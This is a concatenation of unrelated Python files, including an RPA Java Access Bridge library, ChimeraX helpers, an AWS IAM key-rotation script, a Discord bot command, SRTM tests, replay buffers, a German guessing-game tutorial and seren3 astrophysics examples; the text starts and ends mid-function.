middle_x = int((left + right) / 2)
middle_y = int((top + bottom) / 2)
point = f"point:{middle_x},{middle_y}"
Desktop().move_mouse(point)
@keyword
def type_text(
self,
locator: str,
text: str,
index: int = 0,
clear: bool = False,
enter: bool = False,
):
"""Type text into coordinates defined by locator
:param locator: target element
:param text: text to write
:param index: target element if multiple are returned
:param clear: should element be cleared before typing
:param enter: should enter key be pressed after typing
"""
element = self._find_elements(locator, index)
self._click_element_middle(element[0])
element[0].request_focus()
if clear:
self.wait_until_element_is_focused(element[0])
element_cleared = False
for _ in range(10):
Desktop().press_keys("ctrl", "a")
Desktop().press_keys("delete")
try:
self.wait_until_element_text_equals(element[0], "")
element_cleared = True
except ValueError:
pass
if not element_cleared:
raise ValueError(f"Element={element} not cleared")
Desktop().type_text(text, enter=enter)
self.wait_until_element_text_contains(element[0], text)
@keyword
def get_elements(self, locator: str):
"""Get matching elements
:param locator: elements to get
"""
return self._find_elements(locator)
@keyword
def wait_until_element_text_contains(
self, locator: LocatorType, text: str, index: int = 0, timeout: float = 0.5
):
"""Wait until element text contains expected text
:param locator: target element
:param text: element text should contain this
:param index: target element index if multiple are returned
:param timeout: timeout in seconds to wait, default 0.5 seconds
"""
matching = self._get_matching_element(locator, index)
end_time = time.time() + float(timeout)
while time.time() <= end_time:
# pylint: disable=protected-access
if text in matching.text._items.sentence:
return
time.sleep(0.05)
raise ValueError(f"Text={text} not found in element={matching}")
@keyword
def wait_until_element_text_equals(
self, locator: LocatorType, text: str, index: int = 0, timeout: float = 0.5
):
"""Wait until element text equals expected text
:param locator: target element
:param text: element text should match this
:param index: target element index if multiple are returned
:param timeout: timeout in seconds to wait, default 0.5 seconds
"""
matching = self._get_matching_element(locator, index)
end_time = time.time() + float(timeout)
while time.time() <= end_time:
# pylint: disable=protected-access
if text == matching.text._items.sentence:
return
time.sleep(0.05)
raise ValueError(f"Text={text} not found in element={matching}")
@keyword
def wait_until_element_is_focused(
self, locator: LocatorType, index: int = 0, timeout: float = 0.5
):
"""Wait until element is focused
:param locator: target element
:param index: target element index if multiple are returned
:param timeout: timeout in seconds to wait, default 0.5 seconds
"""
matching = self._get_matching_element(locator, index)
end_time = time.time() + float(timeout)
while time.time() <= end_time:
if matching.state == "focused":
return
time.sleep(0.05)
raise ValueError(f"Element={matching} not focused")
@keyword
def get_element_text(self, locator: LocatorType, index: int = 0):
"""Get element text
:param locator: target element
:param index: target element index if multiple are returned
"""
matching = self._get_matching_element(locator, index)
# pylint: disable=protected-access
return matching.text._items.sentence
def _get_matching_element(self, locator: LocatorType, index: int = 0):
matching = None
if isinstance(locator, str):
elements = self._find_elements(locator)
if len(elements) < (index + 1):
raise ElementNotFound(
"Locator '%s' matched only %s elements" % (locator, len(elements))
)
matching = elements[index]
else:
matching = locator
return matching
@keyword
def get_element_actions(self, locator: str):
"""Get list of possible element actions
:param locator: target element
"""
elements = self._find_elements(locator)
return elements[0].get_actions().keys()
def _elements_to_console(self, elements, function=""):
BuiltIn().log_to_console(f"\nElements to Console: {function}")
for elem in elements:
BuiltIn().log_to_console(str(elem).strip())
@keyword
def highlight_element(self, locator: LocatorType, index: int = 0):
"""Highlight an element
:param locator: element to highlight
:param index: target element index if multiple are returned
"""
matching = self._get_matching_element(locator, index)
self.logger.info("Highlighting element: %s", repr(matching))
region_locator = self._get_region_locator(matching)
Desktop().highlight_elements(region_locator)
def _get_scaled_coordinates(self, element):
left = int(self.display_scale_factor * (element.context_info.x))
top = int(self.display_scale_factor * (element.context_info.y))
width = int(self.display_scale_factor * (element.context_info.width))
height = int(self.display_scale_factor * (element.context_info.height))
right = left + width
bottom = top + height
return left, top, right, bottom
def _get_region_locator(self, element):
left, top, right, bottom = self._get_scaled_coordinates(element)
return Desktop().define_region(left, top, right, bottom)
@keyword
def click_element(
self,
locator: LocatorType,
index: int = 0,
action: bool = True,
timeout: int = 10,
):
"""Click element
:param target: element to click
:param index: target element index if multiple are returned
:param action: call click action on element (default), or use coordinates
:param timeout: timeout in seconds to find element
"""
if isinstance(locator, str):
interval = float(0.2)
end_time = time.time() + float(timeout)
while time.time() <= end_time:
start = time.time()
elements = self._find_elements(locator)
if len(elements) > 0:
break
duration = time.time() - start
if duration < interval:
time.sleep(interval - duration)
if len(elements) < (index + 1):
raise ElementNotFound(
"Locator '%s' matched only %s elements" % (locator, len(elements))
)
matching = elements[index]
else:
matching = locator
try:
if action:
self.logger.info("Element click action type:%s", type(matching))
matching.do_action("click")
else:
self._click_element_middle(matching)
except NotImplementedError:
self._click_element_middle(matching)
@keyword
def call_element_action(self, locator: str, action: str):
"""Call element action
:param locator: target element
:param action: name of the element action to call
"""
elements = self._find_elements(locator)
if len(elements) != 1:
raise ElementNotFound("Locator %s did not match a unique element" % locator)
matching = elements[0]
self.logger.info("Element '%s' action", action)
matching.do_action(action)
def _click_element_middle(self, element):
# TODO. change to use RPA.core.geometry Region/Point
# region = Region.from_size(
# element.left,
# element.top,
# element.width,
# element.height
# )
# region.scale(self.scale_factor)
# Desktop().click(region.center)
self.logger.info("Element click coordinates")
left, top, right, bottom = self._get_scaled_coordinates(element)
if left == -1 or top == -1:
raise AttributeError("Can't click on negative coordinates")
middle_x = int((left + right) / 2)
middle_y = int((top + bottom) / 2)
point = f"point:{middle_x},{middle_y}"
Desktop().click(point)
@keyword
def toggle_drop_down(self, locator: str, index: int = 0):
"""Toggle dropdown action on element
:param locator: element locator
:param index: target element index if multiple are returned
"""
elements = self._find_elements(locator)
matching = elements[index]
matching.toggle_drop_down()
@keyword
def application_refresh(self):
"""Refresh application element tree
Might be required action after application element
structure changes after window refresh.
"""
self.context_info_tree = ContextTree(self.jab_wrapper)
@keyword
def press_keys(self, *keys):
"""Press multiple keys down simultaneously
See `Desktop`_ library documentation for supported keys
.. _Desktop: https://rpaframework.org/libraries/desktop/index.html
:param keys: keys to press
"""
Desktop().press_keys(*keys)
@keyword
def print_element_tree(self, filename: str = None):
"""Print current element into log and possibly into a file
:param filename: filepath to save element tree
"""
tree = repr(self.context_info_tree)
self.logger.info(tree)
if filename:
with open(filename, "w") as f:
f.write(tree)
self.logger.info("Context tree written to file '%s'", filename)
return tree
@keyword
def select_menu(self, menu: str, menuitem: str):
"""Select menu by clicking menu elements
:param menu: name of the menu
:param menuitem: name of the menu item
"""
self.click_element(f"role:menu and name:{menu}")
self.click_element(f"role:menu item and name:{menuitem}")
@keyword
def click_push_button(self, button_name: str):
"""Click element of role `push button`
:param button_name: name of the button to click
"""
locator = f"role:push button and name:{button_name}"
self.click_element(locator)
@keyword
def shutdown_jab(self):
"""Call Java Access Bridge process shutdown"""
self.jab_wrapper.shutdown()
|
import os
import shutil
from general_utils.string_utils import get_float_between_ss, get_float_value
from general_utils.temp_utils import gen_dir, free_dir
from general_utils.terminal_utils import get_out
def get_mass_angstrom(map_path):
map_real_path = os.path.abspath(map_path)
path = gen_dir()
# path = "./temp_map_mass"
if os.path.exists(path):
shutil.rmtree(path)
os.mkdir(path)
f = open(path + "/fit.cxc", "w+")
f.write("volume #1 origin 0,0,0 \r\n")
f.write("measure volume #1\r\n")
f.write("exit")
f.close()
commands_real_path = os.path.abspath(path + "/fit.cxc")
mass = 0
error, exit_binary_text = get_out("chimerax", "--nogui", map_real_path, commands_real_path)
if error != 0:
free_dir(path)
raise Exception("Error on try to get mass")
text = exit_binary_text
mass = get_float_between_ss(text, "Enclosed volume for surface (#1.1) =", "\n")
free_dir(path)
return mass
def get_mrc_level(map_path):
map_real_path = os.path.abspath(map_path)
path = gen_dir()
# path = "./temp_map_mass"
if os.path.exists(path):
shutil.rmtree(path)
os.mkdir(path)
f = open(path + "/fit.cxc", "w+")
f.write("exit")
f.close()
commands_real_path = os.path.abspath(path + "/fit.cxc")
level = 0
error, exit_binary_text = get_out("chimerax", "--nogui", map_real_path, commands_real_path)
if error != 0:
free_dir(path)
raise Exception("Error on try to get mass")
text = exit_binary_text
level = get_float_between_ss(text, "at level", ",")
free_dir(path)
return level
def get_cube_len_angstrom(map_path):
map_real_path = os.path.abspath(map_path)
path = gen_dir()
# path = "./temp_map_center"
if os.path.exists(path):
shutil.rmtree(path)
os.mkdir(path)
f = open(path + "/fit.cxc", "w+")
f.write("volume #1 dumpHeader true \r\n")
f.write("exit")
f.close()
commands_real_path = os.path.abspath(path + "/fit.cxc")
_error, exit_binary_text = get_out("chimerax", "--nogui", map_real_path, commands_real_path)
text = exit_binary_text
x = get_float_value(text, 'xlen =', '\n')
y = get_float_value(text, 'ylen =', '\n')
z = get_float_value(text, 'zlen =', '\n')
free_dir(path)
return [x, y, z]
|
def can_evaluate(tree):
if(len(tree) == 3):
return can_evaluate(tree[0]) and can_evaluate(tree[2])
if(type(tree) is list):
return can_evaluate(tree[0])
if(tree[0] >='0' and tree[0] <='9'):
return True
return False
def evaluate(tree):
if(len(tree) == 3):
op = tree[1]
if(op == "+"):
return evaluate(tree[0]) + evaluate(tree[2])
elif(op == "*"):
return evaluate(tree[0]) * evaluate(tree[2])
elif(op == "/"):
return evaluate(tree[0]) / evaluate(tree[2])
elif(op == "%"):
return evaluate(tree[0]) % evaluate(tree[2])
elif(op == "-"):
return evaluate(tree[0]) - evaluate(tree[2])
elif(op == "&"):
return evaluate(tree[0]) & evaluate(tree[2])
elif(op == "|"):
return evaluate(tree[0]) | evaluate(tree[2])
elif(op == "^"):
return evaluate(tree[0]) ^ evaluate(tree[2])
elif(len(tree) == 1 and (type(tree) is list)):
return evaluate(tree[0])
else:
return int(tree)
|
#!/usr/bin/env python
# Copyright 2017 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# Ignore indention messages, since legacy scripts use 2 spaces instead of 4.
# pylint: disable=bad-indentation,docstring-section-indent
# pylint: disable=docstring-trailing-quotes
"""Program to convert power logging config from a servo_ina device
to a sweetberry config.
"""
# Note: This is a py2/3 compatible file.
from __future__ import print_function
import os
import sys
def fetch_records(basename):
"""Import records from servo_ina file.
servo_ina files are python imports, and have a list of tuples with
the INA data.
(inatype, i2caddr, rail name, bus voltage, shunt ohms, mux, True)
Args:
basename: python import name (filename -.py)
Returns:
list of tuples as described above.
"""
ina_desc = __import__(basename)
return ina_desc.inas
def main(argv):
if len(argv) != 2:
print("usage:")
print(" %s input.py" % argv[0])
return
inputf = argv[1]
basename = os.path.splitext(inputf)[0]
outputf = basename + '.board'
outputs = basename + '.scenario'
print("Converting %s to %s, %s" % (inputf, outputf, outputs))
inas = fetch_records(basename)
boardfile = open(outputf, 'w')
scenario = open(outputs, 'w')
boardfile.write('[\n')
scenario.write('[\n')
start = True
for rec in inas:
if start:
start = False
else:
boardfile.write(',\n')
scenario.write(',\n')
record = ' {"name": "%s", "rs": %f, "sweetberry": "A", "channel": %d}' % (
rec[2], rec[4], rec[1] - 64)
boardfile.write(record)
scenario.write('"%s"' % rec[2])
boardfile.write('\n')
boardfile.write(']')
scenario.write('\n')
scenario.write(']')
if __name__ == "__main__":
main(sys.argv)
|
import sys
from photon.demo_util.common.context_base import ContextBase
class FailFastDemo:
"""
Main thread waiting on the 'Fail Fast' event from any other thread.
All other threads are 'daemons' and will exit when this thread exits.
"""
def __init__(self, ctx: ContextBase) -> None:
"""
Args:
ctx: The Context object.
"""
self._logger = ctx._logger
self._logger.info("FailFast")
self._failfast_ev = ctx.failfast_ev
self._startfast_br = ctx.startfast_br
def run(self) -> None:
"""
Run in the main thread.
"""
try:
self._startfast_br.wait() # blocks until all threads are ready
self._logger.info("FailFast running")
self._failfast_ev.wait() # blocks until set by any thread
self._logger.critical("Exiting on a Fail Fast Event")
except KeyboardInterrupt:
self._logger.info("Exiting on KeyboardInterrupt")
finally:
sys.exit(1)
|
"""
@Author: huuuuusy
@GitHub: https://github.com/huuuuusy
系统: Ubuntu 18.04
IDE: VS Code 1.37
工具: python == 3.7.3
"""
"""
思路:
字典保存每一条记录,然后取出前5进行计算
结果:
执行用时 : 116 ms, 在所有 Python3 提交中击败了15.84%的用户
内存消耗 : 13.9 MB, 在所有 Python3 提交中击败了100%的用户
"""
class Solution:
def highFive(self, items):
d = {}
# 保存每一条记录
for item in items:
d[item[0]] = d.get(item[0],[]) + [item[1]]
result = []
# 取出记录进行计算
for key in sorted(d.keys()):
ID_result = [key]+[int(sum(sorted(d[key])[::-1][:5])/5)]
result.append(ID_result)
return result
if __name__ == "__main__":
items = [[1,91],[1,92],[2,93],[2,97],[1,60],[2,77],[1,65],[1,87],[1,100],[2,100],[2,76]]
answer = Solution().highFive(items)
print(answer) |
#!/usr/bin/env python
import boto3
import os
import urllib.parse
import urllib.request
def update_gitlab_variable(k, v):
DATA = urllib.parse.urlencode({'value': v}).encode()
URL = 'https://gitlab.spack.io/api/v4/projects/2/variables/{0}'.format(k)
request = urllib.request.Request(url=URL, data=DATA, method='PUT')
request.add_header('Authorization', 'Bearer %s' % os.environ['GITLAB_TOKEN'])
urllib.request.urlopen(request)
def rotate_iam_keys(iam_user, gitlab_variable_prefix='', protected=True):
print('Begin IAM key rotation for user "{0}"'.format(iam_user))
# Get existing keys.
print('Querying AWS IAM for access keys')
iam = boto3.client('iam')
paginator = iam.get_paginator('list_access_keys')
for response in paginator.paginate(UserName=iam_user):
access_keys = response['AccessKeyMetadata']
num_keys = len(access_keys)
if num_keys < 2:
raise Exception('Expected to find 2 keys for {0}, found {1} instead.'.format(iam_user, num_keys))
# Figure out which of the two access keys is older.
old_key = None
if access_keys[0]['CreateDate'] < access_keys[1]['CreateDate']:
old_key = access_keys[0]
else:
old_key = access_keys[1]
# Delete the old key. It should be safe to do so at this point because it
# hasn't been used by GitLab since the previous run of this script.
print('Deleting old IAM access key')
iam.delete_access_key(
UserName=iam_user,
AccessKeyId=old_key['AccessKeyId'])
# Create a new IAM access key.
print('Creating new IAM access key')
response = iam.create_access_key(UserName=iam_user)
new_key = response['AccessKey']
# Update GitLab to use this new key.
print('Updating GitLab to use new IAM access key')
gitlab_secret_key = '{0}MIRRORS_AWS_SECRET_ACCESS_KEY'.format(gitlab_variable_prefix)
gitlab_secret_value = new_key['SecretAccessKey']
update_gitlab_variable(gitlab_secret_key, gitlab_secret_value)
gitlab_access_id_key = '{0}MIRRORS_AWS_ACCESS_KEY_ID'.format(gitlab_variable_prefix)
gitlab_access_id_value = new_key['AccessKeyId']
update_gitlab_variable(gitlab_access_id_key, gitlab_access_id_value)
print('IAM key rotation for user "{0}" complete!'.format(iam_user))
if __name__ == '__main__':
if 'GITLAB_TOKEN' not in os.environ:
raise Exception('GITLAB_TOKEN environment is not set')
rotate_iam_keys('pull-requests-binary-mirror', gitlab_variable_prefix='PR_')
rotate_iam_keys('develop-binary-mirror')
|
import discord
from Discord.command.Command import *
from Discord.MessageSender import *
from db.function.Tph import *
from db.function.WhInit import *
from db.function.ExistProfil import *
from db.files.data import galonDB
from db.function.ExistWh import *
from db.Player.checkers import *
from db.function.Frequency import *
class Mdj(CtaCommand):
def __init__(self, message, bot):
CtaCommand.__init__(self, message, bot)
self.args1 = {
"cta":"cta",
"c15":"c15"
}
async def run(self):
if not self.has_permission : return await self.not_permission()
try:
fq = await self.get_args(self.args1, 1)
chanfq = Frequency(fq).convertChannelsStringToChannelList().searchTph()
chan_list = chanfq.channels
transmission = ' '.join(self.message.content.split(' ')[2:])
assert fq in ["cta", "c15"]
except:
return await self.error()
avna = {"cta":{"name":"CTA-CODIS-34", "avatar":"https://i.servimg.com/u/f32/11/89/35/34/logo_c11.jpg"},
"c15":{"name":"Centre 15", "avatar":"https://images.midilibre.fr/api/v1/images/view/5b4608153e45464a454a1f4d/large/image.jpg"}
}
for chan in chan_list:
await MessageSender(self.message, self.bot).wh(
name = avna[fq]["name"],
avatar_url = avna[fq]["avatar"],
msg = f"[**{fq}**] > {transmission}",
channel=self.message.guild.get_channel(chan)
)
await self.message.delete()
|
"""Tests for SRTM module."""
import os
import tempfile
import vcr
import pytest
from geohealthaccess.srtm import SRTM
@pytest.fixture(scope="module")
def unauthentified_srtm():
"""Non-authentified EarthData session."""
return SRTM()
@vcr.use_cassette("tests/cassettes/srtm-authenticity-token.yaml")
def test_srtm_authenticity_token(unauthentified_srtm):
unauthentified_srtm = SRTM()
assert unauthentified_srtm.authenticity_token.endswith("==")
@vcr.use_cassette("tests/cassettes/srtm-not-logged-in.yaml")
def test_srtm_not_logged_in(unauthentified_srtm):
assert not unauthentified_srtm.logged_in
def test_srtm_spatial_index(unauthentified_srtm):
sindex = unauthentified_srtm.spatial_index()
assert len(sindex) == 14295
assert sindex.is_valid.all()
assert "S56W070.SRTMGL1.hgt.zip" in sindex.dataFile.values
def test_srtm_search(unauthentified_srtm, senegal, madagascar):
sen_tiles = unauthentified_srtm.search(senegal)
mdg_tiles = unauthentified_srtm.search(madagascar)
assert len(sen_tiles) == 29
assert len(mdg_tiles) == 75
assert sorted(mdg_tiles)[0] == "S12E049.SRTMGL1.hgt.zip"
assert sorted(sen_tiles)[0] == "N12W012.SRTMGL1.hgt.zip"
@vcr.use_cassette("tests/cassettes/srtm-N19W075.yaml", mode="none")
def test_srtm_download():
srtm = SRTM()
TILE = "N19W075.SRTMGL1.hgt.zip"
with tempfile.TemporaryDirectory(prefix="geohealthaccess_") as tmpdir:
fpath = srtm.download(TILE, tmpdir)
assert os.path.isfile(fpath)
@vcr.use_cassette("tests/cassettes/srtm-N12W012.yaml", mode="none")
def test_srtm_download_size():
srtm = SRTM()
TILE = "N12W012.SRTMGL1.hgt.zip"
assert srtm.download_size(TILE) == 10087801
|
import numpy as np
from collections import deque
import torch
import random
class Buffer:
def __init__(self, buffer_size, device = 'cpu'):
self.buffer = deque(maxlen=buffer_size)
self.device = device
def sample(self, n_samples):
samples =random.sample(self.buffer, n_samples)
states, actions, rewards, next_states, dones = map(list,zip(*samples))
rewards = torch.Tensor(np.array(rewards)).to(self.device) # rewards tensor
actions = torch.Tensor(np.array(actions)).to(self.device) # rewards tensor
dones=torch.Tensor(np.array(dones)).to(self.device) # done's tensor
states=torch.stack(states).to(self.device) # initial states tensor
next_states=torch.stack(next_states).to(self.device) # next states tensor
return states, actions, rewards, next_states, dones
def __len__(self):
return len(self.buffer)
def add(self, state, action, reward, next_state, done):
self.buffer.append((state, action, reward, next_state, done))
class SumTree:
def __init__(self, mem_size):
self.tree = np.zeros(2 * mem_size - 1)
self.data = np.zeros(mem_size, dtype=object)
self.size = mem_size
self.ptr = 0
self.nentities=0
def update(self, idx, p):
tree_idx = idx + self.size - 1
diff = p - self.tree[tree_idx]
self.tree[tree_idx] += diff
while tree_idx:
tree_idx = (tree_idx - 1) // 2
self.tree[tree_idx] += diff
def store(self, p, data):
self.data[self.ptr] = data
self.update(self.ptr, p)
self.ptr += 1
if self.ptr == self.size:
self.ptr = 0
self.nentities+=1
if self.nentities > self.size:
self.nentities = self.size
def sample(self, value):
ptr = 0
while ptr < self.size - 1:
left = 2 * ptr + 1
if value < self.tree[left]:
ptr = left
else:
value -= self.tree[left]
ptr = left + 1
return ptr - (self.size - 1), self.tree[ptr], self.data[ptr - (self.size - 1)]
@property
def total_p(self):
return self.tree[0]
@property
def max_p(self):
return np.max(self.tree[-self.size:])
@property
def min_p(self):
return np.min(self.tree[-self.size:])
class Memory:
def __init__(self, max_size):
self.max_size = max_size
self.buffer = deque(maxlen=max_size)
def push(self, state, action, reward, next_state, done):
experience = (state, action, np.array([reward]), next_state, done)
self.buffer.append(experience)
def sample(self, batch_size):
state_batch = []
action_batch = []
reward_batch = []
next_state_batch = []
done_batch = []
batch = random.sample(self.buffer, batch_size)
for experience in batch:
state, action, reward, next_state, done = experience
state_batch.append(state)
action_batch.append(action)
reward_batch.append(reward)
next_state_batch.append(next_state)
done_batch.append(done)
return state_batch, action_batch, reward_batch, next_state_batch, done_batch
def __len__(self):
return len(self.buffer)
|
# Hier soll der User eine Chance bekommen eine Zahl zu errraten.
# Das hier ist die Zahl, die der User erraten soll. Hier bei handelt es sich um
# eine sogenannte Konstante. Das ist eine Variabele, dessen Wert konstant ist.
# Das heißt deren Wert sich nie verändert und sich auch nie verändern soll.
# Die Abmachung in Python ist, dass Konstanten komplett in Großbuchstaben mit
# Unterstrichen seperiert benannt werden sollen.
SECRET_NUMBER = 87
# Im folgenden Block wird eine Zahl vom User abgefragt. Hierbei ist für Python
# jede Abfrage vom User die wir mit input machen standartmäßig ein String, also
# ein Text und keine Zahl. Mit int können wir Python sagen, dass es sich bei
# dieser Eingabe um eine ganze Zahl handelt. Das kann jedoch zu Fehlern führen,
# da der User ja zum Beispiel trotzdem einfach Text eingeben kann. Das führt
# dann zu einem ValueError. Um das zuverhinden versuchen (try) wir diese Aktion
# auszuführen und falls sie mit einem ValueError abbricht (except ValueError)
# informieren wir den User stattdessen und beenden das Program frühzeitig.
try:
# Das \n am Ende des Strings sorgt dafür, dass die Eingabe in der nächsten
# Zeile gemacht wird.
user_number = int(input("Errate meine Zahl zwischen 1 und 100!\n"))
except ValueError:
print("Sorry, das ist ja nicht mal eine Zahl.")
exit()
# Hier wird dann abgefragt, ob die Usereingabe mit der geheimen Zahl
# übereinstimmt und entsprechend eine Ausgabe erzeugt.
if user_number == SECRET_NUMBER:
print("Richtig!")
else:
print("Falsch!")
|
########################################## HALOS ##########################################
def amr_halo_average_qty(context, qty, lengh_unit="pc", halo=None):
'''
(Volume) Average a given quantity in the desiered halos virial sphere
'''
import numpy as np
if (halo is None):
# As an example, here we load a halo catalogue made with rockstar and get
# the most massive halo from it
halos = context.halos(finder="rockstar") # fiinder = "ahf", "rockstar" or "ctrees" (consistent trees)
halo = halos.sort("Mvir")[0] # sorts from massive -> small
# There is a small bug at the moment where the SimArray conversion context (which contains)
# the scale factor and hubble param.) is not always propagated when operating on the array.
# So to keep correct unit information for halo volumes, we have to do the following
halo_volume = halo.sphere.get_volume()
halo_volume = context.array(halo_volume, halo_volume.units) # now this array can convert units involving a and h
dset = halo.g[[qty, "dx"]].flatten() # load our field and cell-width
field = dset[qty]
dx = dset["dx"].in_units(lengh_unit)
vol = halo_volume.in_units("%s**3" % lengh_unit)
return np.sum(field * dx**3) / vol
########################################## SIMULATIONS ##########################################
def simulation_example(path, zi=6., name=None):
'''
Sometimes, it's useful to start with a simulation object, and then load your snapshot
'''
import seren3
sim = None # init
# Load our simulation
if (name is not None): # load by name
sim = seren3.load(name)
else:
# Just init from the path
sim = seren3.init(path)
print sim
# Now, lets load the snapshot which is closest to the desired redshift
ioutput = sim.redshift(zi) # output number
snapshot = sim[ioutput]
# There are also interpolators for age -> redshift and vise versa, for our chosen cosmology
age_func = sim.age_func(zmax=100., zmin=0.)
z_func = sim.redshift_func(zmax=100., zmin=0.)
age_of_universe = age_func(snapshot.z)
redshift = z_func(age_of_universe)
print snapshot.z, redshift, age_of_universe
########################################## FILTERING ##########################################
def spherical_filter(snapshot, center=None, radius=None):
'''
Filter a spherical sub-snapshot from the full volume
'''
# Lets just filter a simple sphericl sub-volume in the center of our box (supply your own center/radius if you want).
if (center is None):
center = [.5, .5, .5] # center in usual box units of [0., 1.)]
if (radius is None):
radius = 0.1
# All values passed to this routine must be in code-length units
sphere = snapshot.get_sphere(center, radius)
# Snapshots __getitem__ accepts any pymses.utils.regions object as a filter
sub_snapshot = snapshot[sphere]
# Now data access with sub_snapshot in the usual syntax will only return
# cells/particles in this sub-volume, i.e
# dset = sub_snapshot.g["rho"].flatten()
return sub_snapshot
########################################## GAS ##########################################
def spherical_profile(context, field):
'''
Made a spherical profile of this container (can be a snapshot, halo or a subsnap)
'''
import matplotlib.pylab as plt
npoints = int(1e6) # number of sampling points, as the AMR grid is sampled uniformly. it doesn't like XeX syntax, so just parse with int
nbins=50 # number of bins for the profile
divide_by_counts = True # True for AMR profiles, False for particle profiles
prof, r_bins = context.g.bin_spherical(field, npoints, nbins, divide_by_counts=divide_by_counts)
# plot it
prof_unit_latex = prof.units.latex()
r_bins_latex = r_bins.units.latex()
plt.loglog(r_bins, prof, linewidth=2.)
plt.xlabel(r"radius [$%s$]" % r_bins_latex)
plt.xlabel(r"profile [$%s$]" % prof_unit_latex)
plt.show()
def splatter_projection_intensive(context):
'''
Make a projection of the desired (intensive) field using the splatter engine
'''
from seren3.analysis.visualization import engines, operators
# density is an intensive variable, but the splatter engine requires
# extensive variables, therefore we use a mass-weighted operator
field = "rho"
unit = context.C.kg * context.C.m**-3 # pymses units
op = operators.MassWeightedOperator("rho", unit)
# a MassWeightedSpatterEngine already exists, but for this example I demonstrate how to use the custom engine
# CustomEngines require you set the above operator, which (as above), need to know the correct unit
engine = engines.CustomSplatterEngine(context.g, field, op) # gas - context.g
camera = context.camera() # the camera object specifying the region we want to image
# We can make a higher resolution image by modifying the map_max_size param of our camera object
# this should be a power of 2
camera.map_max_size = 2048
projection = engine.process(camera)
# this function takes args such as colormap etc if you desire.
# just run help(projection.save_plot()) to see available options
im = projection.save_plot()
im.show() # show the plot
def raytracing_projection_extensive(context):
'''
Make a projection of the desired (extensive) field using the raytracer
'''
from seren3.analysis.visualization import engines
# this is much simpler than the above
field = "nH" # derived field this time
# the engine sets the operator and unit for us
engine = engines.RayTraceEngine(context.g, field)
camera = context.camera()
camera.map_max_size = 2048
# The syntax is the same...
projection = engine.process(camera)
# this function takes args such as colormap etc if you desire.
# just run help(projection.save_plot()) to see available options
im = projection.save_plot()
im.show() # show the plot
def raytracing_projection_extensive_simple(context):
'''
There is a shortcut for simple projections on the Family object
'''
from seren3.analysis.visualization import EngineMode # enum that lets us choose projection mode
projection = context.g.projection("nH", mode=EngineMode.RAYTRACING)
im = projection.save_plot()
im.show() # show the plot
def compute_fb(context, mass_unit="Msol h**-1"):
'''
Computes the baryon fraction for this container
'''
import numpy as np
part_dset = context.p[["id", "mass", "epoch"]].flatten()
ix_dm = np.where(np.logical_and( part_dset["id"] > 0., part_dset["epoch"] == 0 )) # index of dm particles
ix_stars = np.where( np.logical_and( part_dset["id"] > 0., part_dset["epoch"] != 0 ) ) # index of star particles
gas_dset = context.g["mass"].flatten()
part_mass_tot = part_dset["mass"].in_units(mass_unit).sum()
star_mass_tot = part_dset["mass"].in_units(mass_unit)[ix_stars].sum()
gas_mass_tot = gas_dset["mass"].in_units(mass_unit).sum()
tot_mass = part_mass_tot + gas_mass_tot
fb = (gas_mass_tot + star_mass_tot)/tot_mass
return fb, tot_mass
def sample_points_to_cube(context, field, N=128, plot=False):
'''
Samples the desired SCALAR field to a cube with N^3 cells
'''
source = context.g[field] # the SerenSource object
# First, generate a mesh of points at which to sample the gas.
# This method generates points spanning the full domain,
# but you can write your own for sub-regions
print "Generating point mesh..."
points = source.generate_uniform_points(N)
print "Done"
# Sample at these locations
print "Sampling AMR grid at specified points..."
dset = source.sample_points(points)
print "Done"
# The resulting array is flattened, but can be reshaped as follows
data = dset[field].reshape((N,N,N))
if plot:
import numpy as np
import matplotlib.pylab as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
field_units = dset[field].units
# plot extent
boxsize = context.boxsize
latex = boxsize.units.latex()
extent = [0, boxsize, 0, boxsize]
# Plot a slice and a projection
fig, axs = plt.subplots(nrows=1, ncols=2, figsize=(10,10))
im1 = axs[0].imshow(np.log10(data)[:,:,int(N/2)], extent=extent) # slice through centre in z plane
axs[0].set_title("Slice of field %s" % field, fontsize=16)
# Fit colorbar to axis
divider = make_axes_locatable(axs[0])
cax = divider.append_axes("right", size="5%", pad=0.05)
cbar1 = plt.colorbar(im1, cax=cax)
cbar1.set_label(r"log$_{10}$(%s [$%s$])" % (field, field_units.latex()))
im2 = axs[1].imshow(np.log10(data).sum(axis=2), extent=extent) # projection along z plane
axs[1].set_title("Projection of field %s" % field, fontsize=16)
# Fit colorbar to axis
divider = make_axes_locatable(axs[1])
cax = divider.append_axes("right", size="5%", pad=0.05)
cbar2 = plt.colorbar(im2, cax=cax)
cbar2.set_label(r"$\sum$ log$_{10}$(%s [$%s$])" % (field, field_units.latex()))
for ax in axs.flatten():
ax.set_xlabel(r"x [$%s$]" % latex)
ax.set_ylabel(r"y [$%s$]" % latex)
fig.tight_layout()
plt.show()
print data.shape
return dset, data
########################################## STARS ##########################################
# from seren3.analysis.stars.__init__.py
def sfr(context, ret_sSFR=False, nbins=100, **kwargs):
'''
Compute the (specific) star formation rate within this context.
'''
import numpy as np
from seren3.array import SimArray
from seren3.exceptions import NoParticlesException
dset = context.s[["age", "mass"]].flatten()
age = dset["age"].in_units("Gyr")
mass = dset["mass"].in_units("Msol")
if len(age) == 0 or len(mass) == 0:
raise NoParticlesException("No particles found while computing SFR", 'analysis/stars/sfr')
def compute_sfr(age, mass, nbins=nbins, **kwargs):
agerange = kwargs.pop('agerange', [age.min(), age.max()])
binnorm = SimArray(1e-9 * nbins / (agerange[1] - agerange[0]), "yr**-1")
weights = mass * binnorm
sfrhist, bin_edges = np.histogram(age, weights=weights, bins=nbins, range=agerange, **kwargs)
binmps = np.zeros(len(sfrhist))
binsize = np.zeros(len(sfrhist))
for i in np.arange(len(sfrhist)):
binmps[i] = np.mean([bin_edges[i], bin_edges[i + 1]])
binsize[i] = bin_edges[i + 1] - bin_edges[i]
return SimArray(sfrhist, "Msol yr**-1"), SimArray(binmps, "Gyr"), SimArray(binsize, "Gyr")
sfrhist, lookback_time, binsize = compute_sfr(age, mass, **kwargs)
SFR = sfrhist.in_units("Msol Gyr**-1")
if ret_sSFR:
SFR /= mass.sum() # specific star formation rate
SFR.set_field_latex("$\\mathrm{SFR}$")
lookback_time.set_field_latex("$\\mathrm{Lookback-Time}$")
binsize.set_field_latex("$\Delta$")
return SFR, lookback_time, binsize # SFR [Msol Gyr^-1] (sSFR [Gyr^-1]), Lookback Time [Gyr], binsize [Gyr]
def test_sfr(context):
'''
Test SFR calculation is working correctly by integrating and comparing to total stellar mass
'''
import seren3
